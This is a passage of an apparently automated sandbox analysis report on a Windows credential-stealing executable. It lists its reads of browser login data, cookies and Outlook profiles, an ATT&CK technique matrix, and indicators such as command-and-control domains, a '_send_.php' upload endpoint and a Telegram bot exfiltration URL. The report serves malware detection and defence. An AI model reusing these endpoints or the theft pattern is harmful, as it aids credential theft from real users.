                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts12
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager1
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing
                  NTDS2
                  Process Discovery
                  Distributed Component Object Model1
                  Email Collection
                  1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets31
                  Virtualization/Sandbox Evasion
                  SSH1
                  Input Capture
                  3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNC1
                  Clipboard Data
                  24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  VbcXXnmIwPPhh.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://aborters.duckdns.org:8081100%URL Reputationmalware
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                  http://anotherarmy.dns.army:8081100%URL Reputationmalware
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://varders.kozow.com:80810%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://www.office.com/0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                  https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                  https://api.telegram.org/bot0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.214.172
                  truefalse
                    unknown
                    reallyfreegeoip.org
                    188.114.96.3
                    truetrue
                      unknown
                      api.telegram.org
                      149.154.167.220
                      truetrue
                        unknown
                        mail.jhxkgroup.online
                        217.12.218.219
                        truetrue
                          unknown
                          checkip.dyndns.com
                          132.226.8.169
                          truefalse
                            unknown
                            checkip.dyndns.org
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://checkip.dyndns.org/false
                              • URL Reputation: safe
                              unknown
                              https://reallyfreegeoip.org/xml/8.46.123.33false
                              • Avira URL Cloud: safe
                              unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://aborters.duckdns.org:8081VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              unknown
                              https://ac.ecosia.org/autocomplete?q=VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.office.com/VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/chrome_newtabVbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://duckduckgo.com/ac/?q=VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoVbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://51.38.247.67:8081/_send_.php?LVbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.org/botVbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.000000000325B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://anotherarmy.dns.army:8081VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchVbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://checkip.dyndns.org/qVbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://chrome.google.com/webstore?hl=enVbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.ecosia.org/newtab/VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://varders.kozow.com:8081VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedVbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
